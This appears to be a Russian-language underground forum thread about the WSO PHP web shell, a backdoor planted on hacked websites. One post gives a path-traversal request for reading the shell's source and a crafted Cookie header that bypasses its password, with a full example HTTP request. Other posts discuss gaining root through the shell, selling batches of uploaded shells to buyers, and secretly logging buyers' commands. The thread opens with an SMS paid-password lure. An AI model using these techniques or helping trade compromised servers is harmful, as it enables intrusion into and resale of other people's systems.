Для получения пароля, отправь СМС на короткий номер 9535 с текстом, "WSO 2.5" в ответ получишь пароль
WSO 2.5 modif - выдает ошибку "Query did not return anything" что в строке PHP указать? я вроде указываю путь из php.ini - но все равно, если ввести 2 поля верхних то он показывает что есть рут, поле 3 ввожу, и все ошибка. Думаю что то связано с PHP Интерпретатором, wrapper.php в связке с wso_root.php, перестали работать, можете помочь?)
Не то, что бы это дикий пиздец, но если вдруг, вы забыли пароль к своему шеллу WSO, и у вас есть возможность прочитать исходник, можно увидеть вполне элементарную строчку: PHP: $auth_pass = "5deeb7c8589e337d46a3b2f807af33fd"; # md5(пароль) Но к сожалению если ваша память коротка, а cmd5 и подобные сервисы не в силах сбрутить пароль по типу "md5(FmST[3XjPW) = 5deeb7c8589e337d46a3b2f807af33fd", а текстовый документ с исходным паролем чудом не сохранился. Расстраиваться не нужно. Достаточно послать в запросе в заголовке Cookie md5 сумму хоста, и прочитанный хеш. К примеру, шелл тут: http://google.com/images/wso.php Возможность прочитать исходник тут: http://google.com/index.php?file=../images/wso.php Получаем: PHP: $auth_pass = "5deeb7c8589e337d46a3b2f807af33fd"; # md5(пароль) Посылаем запрос: Code: GET /images/wso.php HTTP/1.1 Host: google.com Cookie: 1d5920f4b44b27a802bd77c4f0536f5a=5deeb7c8589e337d46a3b2f807af33fd Меняем пароль, на тот который в состоянии запомнить, и всё. Не знаю кому эта информация сможет пригодиться, но пусть полежит здесь.
У меня сделка через 4 часа.. Человек оплачивает хххх$ с протекцией, потом получает пачку шеллов залитый, потом передаёт код, а потом я передаю пароль. Вот я и думаю теперь насколько вероятно для него будет не дать мне код протекции (человек сомнительный, если честно), а просто попытаться расшифровать хэш =)
Что за фигня? При смене пароля на свой авторизоваться не хочет, ввожу правильно и уже не первый раз так
Есть возможность отследить действия через шелл или добавиться код чтоб в отдельный файл логировал все команды ,а то в последнее время частенько берут шеллы на проверку ,а потом мол "неподошел".